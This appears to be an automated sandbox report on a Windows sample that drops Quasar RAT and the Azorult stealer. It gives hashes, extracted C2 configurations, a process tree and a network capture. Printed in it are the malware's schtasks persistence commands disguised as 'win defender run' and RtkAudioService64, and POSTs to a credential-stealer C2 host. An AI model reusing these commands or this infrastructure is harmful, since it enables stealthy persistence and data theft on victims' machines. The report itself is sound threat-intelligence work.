Analysis

  • max time kernel
    3s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    10-01-2025 23:33

General

  • Target

    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe

  • Size

    2.0MB

  • MD5

    b342fc1721147d746388d4bf6c987a04

  • SHA1

    bcb7f37269b927d2607578804be99ce1eb85f72a

  • SHA256

    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28

  • SHA512

    2f64b632fa7b9c11f0cad0920ae348f5967535f91a449b2619641c227ca1e89ed9391c80dd3fe4285ff50978f62b573e1824312fdc3daf53ad20c61b1840dca5

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKY4:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Ya

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443

Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 9 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    "C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe"
    1⤵
    • Loads dropped DLL
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2888
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        3⤵
        • Maps connected drives based on registry
        PID:3012
    • C:\Users\Admin\AppData\Local\Temp\windef.exe
      "C:\Users\Admin\AppData\Local\Temp\windef.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2616
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:3036
      • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
        "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2972
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3040
    • C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
      "C:\Users\Admin\AppData\Local\Temp\498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2588
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2328

Network

  • flag-us
    DNS
    0x21.in
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    Remote address:
    8.8.8.8:53
    Request
    0x21.in
    IN A
    Response
    0x21.in
    IN A
    44.221.84.105
  • flag-us
    POST
    http://0x21.in:8000/_az/
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    Remote address:
    44.221.84.105:8000
    Request
    POST /_az/ HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    Host: 0x21.in:8000
    Content-Length: 103
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 23:33:05 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: btst=ded3248e2a265fb55acb3825ed001050|181.215.176.83|1736551985|1736551985|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • flag-us
    DNS
    ip-api.com
    winsock.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/json/
    windef.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /json/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 23:33:05 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 291
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    0x21.in
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    Remote address:
    8.8.8.8:53
    Request
    0x21.in
    IN A
    Response
    0x21.in
    IN A
    44.221.84.105
  • flag-us
    POST
    http://0x21.in/_az/
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    Remote address:
    44.221.84.105:8000
    Request
    POST /_az/ HTTP/1.0
    Host: 0x21.in
    Connection: close
    User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    Content-Length: 103
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 23:33:05 GMT
    Content-Type: text/html
    Connection: close
    Set-Cookie: btst=fe4cac3602af50c4ceae3bb2a00d9c5c|181.215.176.83|1736551985|1736551985|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=181.215.176.83; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • flag-us
    GET
    http://ip-api.com/json/
    winsock.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /json/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Fri, 10 Jan 2025 23:33:06 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 291
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • 5.8.88.191:8080
    svchost.exe
    152 B
    3
  • 44.221.84.105:8000
    http://0x21.in:8000/_az/
    http
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    487 B
    870 B
    5
    5

    HTTP Request

    POST http://0x21.in:8000/_az/

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/json/
    http
    windef.exe
    328 B
    560 B
    4
    2

    HTTP Request

    GET http://ip-api.com/json/

    HTTP Response

    200
  • 44.221.84.105:8000
    http://0x21.in/_az/
    http
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    476 B
    590 B
    5
    5

    HTTP Request

    POST http://0x21.in/_az/

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/json/
    http
    winsock.exe
    374 B
    560 B
    5
    2

    HTTP Request

    GET http://ip-api.com/json/

    HTTP Response

    200
  • 5.8.88.191:443
    winsock.exe
    152 B
    3
  • 5.8.88.191:8080
    152 B
    3
  • 5.8.88.191:8080
    152 B
    3
  • 5.8.88.191:8080
    152 B
    3
  • 5.8.88.191:8080
    152 B
    3
  • 5.8.88.191:8080
    152 B
    3
  • 8.8.8.8:53
    0x21.in
    dns
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    53 B
    69 B
    1
    1

    DNS Request

    0x21.in

    DNS Response

    44.221.84.105

  • 8.8.8.8:53
    ip-api.com
    dns
    winsock.exe
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    0x21.in
    dns
    498421e2892ef6a315f64be9517f62bf98434ac422d2eb881bfe6c6b6c92cb28.exe
    53 B
    69 B
    1
    1

    DNS Request

    0x21.in

    DNS Response

    44.221.84.105

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\vnc.exe

    Filesize

    405KB

    MD5

    b8ba87ee4c3fc085a2fed0d839aadce1

    SHA1

    b3a2e3256406330e8b1779199bb2b9865122d766

    SHA256

    4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4

    SHA512

    7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2

  • \Users\Admin\AppData\Local\Temp\windef.exe

    Filesize

    349KB

    MD5

    b4a202e03d4135484d0e730173abcc72

    SHA1

    01b30014545ea526c15a60931d676f9392ea0c70

    SHA256

    7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9

    SHA512

    632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb

  • memory/2588-28-0x0000000000080000-0x00000000000A0000-memory.dmp

    Filesize

    128KB

  • memory/2588-40-0x0000000000080000-0x00000000000A0000-memory.dmp

    Filesize

    128KB

  • memory/2588-36-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

    Filesize

    4KB

  • memory/2588-30-0x0000000000080000-0x00000000000A0000-memory.dmp

    Filesize

    128KB

  • memory/2616-46-0x0000000000A60000-0x0000000000ABE000-memory.dmp

    Filesize

    376KB

  • memory/2888-43-0x00000000002B0000-0x00000000002B1000-memory.dmp

    Filesize

    4KB

  • memory/2972-64-0x0000000000990000-0x00000000009EE000-memory.dmp

    Filesize

    376KB

  • memory/3012-49-0x000007FFFFFDD000-0x000007FFFFFDE000-memory.dmp

    Filesize

    4KB

  • memory/3012-47-0x0000000000020000-0x0000000000021000-memory.dmp

    Filesize

    4KB

  • memory/3012-54-0x00000000003E0000-0x000000000047C000-memory.dmp

    Filesize

    624KB

  • memory/3012-50-0x00000000003E0000-0x000000000047C000-memory.dmp

    Filesize

    624KB
